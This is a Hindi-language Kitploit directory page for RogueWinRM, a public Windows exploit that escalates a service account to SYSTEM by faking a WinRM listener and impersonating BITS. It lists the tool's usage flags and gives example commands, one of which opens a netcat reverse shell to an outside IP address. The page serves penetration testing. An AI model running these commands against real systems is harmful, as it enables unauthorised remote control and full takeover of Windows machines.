Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
RogueWinRM — सेवा खाते से सिस्टम तक विंडोज स्थानीय विशेषाधिकार वृद्धि | Kitploit
उपकरण/GitHubGitHub/antoniococo/roguewinrm
विशेषाधिकार वृद्धिशोषणपेनिट्रेशन टेस्टिंग
GitHubantoniococo/roguewinrm

RogueWinRM

सेवा खाते से सिस्टम तक विंडोज स्थानीय विशेषाधिकार वृद्धि

रिपॉजिटरी देखें
9641126 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

RogueWinRM

RogueWinRM एक स्थानीय विशेषाधिकार वृद्धि शोषण है जो सेवा खाते (SeImpersonatePrivilege के साथ) से स्थानीय सिस्टम खाते में वृद्धि करने की अनुमति देता है यदि WinRM सेवा चल रही नहीं है (Win10 पर डिफ़ॉल्ट लेकिन Windows Server 2019 पर नहीं)।

संक्षेप में, यह पोर्ट 5985 पर आने वाले कनेक्शन के लिए सुनता है, एक वास्तविक WinRM सेवा का नकली रूप धारण करता है।
यह एक न्यूनतम वेबसर्वर है जो उस पोर्ट पर कनेक्ट करने का प्रयास करने वाली किसी भी सेवा के साथ NTLM प्रमाणीकरण पर बातचीत करने का प्रयास करेगा।
फिर BITS सेवा (स्थानीय सिस्टम के रूप में चल रही) ट्रिगर होती है और वह हमारे नकली लिसनर पर प्रमाणित करने का प्रयास करेगी। हमारे नकली लिसनर पर प्रमाणित होने के बाद, हम स्थानीय सिस्टम उपयोगकर्ता का प्रतिरूपण कर सकते हैं और उन विशेषाधिकारों के साथ एक मनमाना प्रक्रिया उत्पन्न कर सकते हैं।

आप इस भेद्यता का पूर्ण तकनीकी विवरण इस लिंक पर पा सकते हैं --> https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/

उपयोग

root@kitploit:~
RogueWinRM

अनिवार्य तर्क:
-p <प्रोग्राम>: लॉन्च करने के लिए प्रोग्राम

वैकल्पिक तर्क:
-a <तर्क>: प्रोग्राम को पास करने के लिए कमांड लाइन तर्क (डिफ़ॉल्ट NULL)
-l <पोर्ट>: सुनने वाला पोर्ट (डिफ़ॉल्ट 5985 WinRM)
-d : डिबगिंग आउटपुट सक्षम करें

उदाहरण

RogueWinRM

एक इंटरैक्टिव cmd चलाना:

root@kitploit:~
RogueWinRM.exe -p C:\windows\system32\cmd.exe

Netcat रिवर्स शेल चलाना:

root@kitploit:~
RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "10.0.0.1 3001 -e cmd"

लेखक

  • Antonio Cocomazzi
  • Andrea Pierini
  • Roberto (0xea31)
टूल डाउनलोड करें